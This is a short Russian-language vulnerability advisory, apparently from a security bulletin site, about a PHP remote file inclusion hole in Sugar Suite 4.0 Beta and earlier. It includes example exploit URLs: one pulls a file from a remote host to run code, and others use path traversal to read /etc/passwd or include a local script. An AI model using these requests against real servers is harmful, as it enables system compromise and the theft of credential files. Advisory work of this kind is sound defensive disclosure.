PHP инклюдинг в Sugar Suite

Дата публикации:
20.12.2005
Всего просмотров:
2097
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Sugar Suite 3.x
Уязвимые версии: Sugar Suite 4.0 Beta и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "beanFiles[1]" в сценарии "acceptDecline.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе с привилегиями Web сервера. Для успешной эксплуатации уязвимости опция "register_globals" is должна быть включена. Примеры:

http://[target]/[path_to_sugar]/acceptDecline.php?beanFiles[1]=
http://[remote_location]/index.html&beanList[1]=1&module=1

http://[target]/[path_to_sugar]/acceptDecline.php?beanFiles[1]=
../../../../../../../../etc/passwd&beanList[1]=1&module=1
http://[target]/[path_to_sugar]/acceptDecline.php?beanFiles[1]=
../../../../../../../../../script.php&beanList[1]=1&module=1

URL производителя: www.sugarcrm.com/crm/

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

Ссылки: SugarSuite Open Source <= 4.0beta Remote code execution

или введите имя

CAPTCHA